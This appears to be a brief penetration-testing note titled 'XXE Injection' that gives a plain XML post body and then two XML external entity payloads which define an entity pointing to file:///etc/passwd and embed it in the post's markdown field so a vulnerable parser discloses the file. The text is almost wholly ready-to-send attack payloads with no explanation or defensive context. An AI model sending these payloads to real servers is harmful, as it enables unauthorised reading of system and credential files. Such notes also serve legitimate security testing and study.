XXE Injection
<post>
<title>test</title>
<description>message test</description>
<markdown>test test test</markdown>
</post><?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<post>
<title>test</title>
<description>message test</description>
<markdown>&xxe;</markdown>
</post><?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY example SYSTEM "file:///etc/passwd" >]>
<post>
<title>test</title>
<description>message test</description>
<markdown>&example;</markdown>
</post>Last updated